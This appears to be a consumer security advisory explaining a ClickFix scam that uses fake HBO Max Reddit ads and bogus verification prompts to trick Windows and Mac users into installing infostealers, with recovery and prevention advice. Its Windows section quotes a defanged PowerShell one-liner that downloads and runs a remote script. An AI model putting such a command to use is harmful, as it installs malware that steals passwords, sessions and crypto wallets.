ClickFix Self-Hack Scam: Fake HBO Max Reddit Ads Targeting Mac and Windows Users Explained

TL;DR
- Fake HBO Max ads spotted on Reddit in early September 2026 are redirecting Mac and Windows users to lookalike streaming sites that push a fake verification check to trigger a ClickFix self-infection.
- The scam doesn't exploit software flaws — it tricks you into pasting a hidden malicious command via Run on Windows or Terminal on Mac, installing info-stealers like Lumma Stealer, StealC, and Atomic macOS Stealer.
- If you ran the command, disconnect, change passwords from a clean device, run a full antivirus scan, and never copy-paste commands from a website verification prompt again.
What Is ClickFix and Why It's Everywhere Right Now
ClickFix is not a traditional virus. It's a social engineering trick that has become the go-to delivery method for cybercriminals in 2025 and 2026 because it bypasses almost all security software.
Instead of trying to hack you, attackers convince you to hack yourself. Security researchers have tracked ClickFix campaigns impersonating Cloudflare, reCAPTCHA, Google Meet, Zoom, and software fixes. The new twist uncovered this month is entertainment bait: fake HBO Max promotions.
According to recent reports from threat researchers tracking malvertising in early September 2026, ClickFix now accounts for a huge share of initial-access infections for infostealers. It works because there is no malicious download to block — just a user following instructions they think are legitimate.
How the Fake HBO Max Reddit Scam Works
It starts with a promoted post on Reddit. The ads look surprisingly real, using HBO Max logos, stills from House of the Dragon, The Last of Us, and Euphoria, and promises like Get HBO Max Lifetime for $1.99, HBO Max Free Trial Extended, or Watch New Episodes Early Before Official Release.
Clicking the ad does not take you to max.com. Victims are sent through a cloaked redirect to domains like hbomax-offer.stream, max-premium-access.com, and watch-hbomax-hd.live — all registered in late August 2026.
Once there, the site looks like a streaming portal or subscription page. After a few seconds you get a pop-up that looks like a bot check: Something went wrong verifying you are human, Please follow the steps below to verify, or Cloudflare Verification Required to access HBO Max.
That pop-up is the trap.
The Windows Infection Chain: Press Win+R and Get Owned
For Windows users, the fake verification box shows a 3-step instruction with a Verify button:
- Step 1: Press Windows + R to open Run
- Step 2: Press Ctrl + V to paste
- Step 3: Press Enter to verify
What users don't realize is that clicking the Verify button secretly copies a malicious PowerShell command to their clipboard. It looks like a verification code but is actually something like powershell -w hidden -c irm hxxps://fake-cdn-verification.top/v.js | iex or a mshta.exe link.
When you paste and hit Enter, Windows silently downloads and runs Lumma Stealer or StealC. Within seconds, it steals saved browser passwords, cookies, crypto wallets, session tokens for email and banking, and Discord and Telegram logins. Newer variants also drop a remote access backdoor for persistence.
The Mac Infection Chain: A Terminal Trick for AMOS
Mac users were long told they were safe from this, but this campaign has a dedicated macOS flow. Instead of Win+R, Mac victims see: Open Terminal via Spotlight, Paste Verification Command, Press Enter.
The copied command is a one-liner curl script that downloads Atomic macOS Stealer, also known as AMOS — currently the most active Mac infostealer. It prompts for your system password with a fake system prompt, then steals Keychain passwords, browser data, Apple Notes, crypto wallets, and files.
Researchers note this is one of the first large-scale ClickFix campaigns with fully polished Mac instructions, which is why infection rates are unusually high.
Why This Scam Is So Effective
Three factors make this campaign especially dangerous.
First, trust in the platform. Reddit ads carry built-in credibility, and attackers abused Reddit's ad system with aged accounts and rotating domains to keep the ads alive for days before takedown.
Second, HBO Max nostalgia is perfect bait. With Warner Bros. Discovery reverting the Max name back to HBO Max in 2025 and launching high-profile shows in summer 2026, search interest is massive. People expect deals and are less suspicious.
Third, ClickFix exploits verification fatigue. We are so used to clicking I'm Not a Robot and following weird Cloudflare checks that copying something to verify feels normal. There are no red browser warnings because you are manually running the command, so antivirus often sees it as legitimate user activity.
How to Tell If You Fell For It
If you followed the steps, assume you are compromised. Warning signs include:
- Your clipboard contained a long command with powershell, mshta, curl, sh, or http instead of a short code.
- Your browser saved passwords stopped working or you got logged out of accounts.
- Your crypto wallet was drained or you received password reset alerts you didn't request.
- Antivirus flags Lumma, StealC, AMOS, or a Python script running at startup.
On Mac, check for unknown launch agents or a Terminal command history showing a curl to an unfamiliar domain. On Windows, check PowerShell history and Task Scheduler for unknown tasks created around the time you visited the site.
What to Do Immediately If You Ran the Command
Do not just close the tab. Act fast:
- Disconnect from the internet to cut off data exfiltration.
- From a clean phone or computer, change your email, banking, Apple ID, Google, and crypto passwords first, and log out all sessions.
- Enable two-factor authentication everywhere.
- Run a full scan with Windows Defender plus Malwarebytes, or Malwarebytes for Mac and CleanMyMac X-ray, then delete any identified persistence items.
- Check your browser extensions for unknown additions and reset your browser if needed.
- Freeze credit and monitor wallets if financial data was stored in your browser.
If it was a work device, notify your IT team immediately — stolen session cookies can let attackers bypass MFA.
How to Spot and Stop the Next ClickFix Attack
No legitimate website will ever ask you to press Windows + R, open Terminal, paste something, or run a command to prove you're human. Real CAPTCHAs only require clicking images or a checkbox.
Turn on enhanced protection in Chrome, Edge, or Safari to warn about deceptive sites. Use an ad blocker like uBlock Origin to block malicious Reddit redirects. Hover over ads to check the real destination URL before clicking, and only go to max.com directly for HBO Max offers. Disable autofill for passwords and use a dedicated password manager instead of browser storage.
Reddit says it removed the reported ad accounts in early September, but researchers warn the same actors are already rotating to Netflix, Disney+, and Spotify lures. The golden rule for 2026: if a verification tells you to use your keyboard, it's not verification — it's infection.
Get All The Latest Updates Delivered Straight To Your Inbox For Free!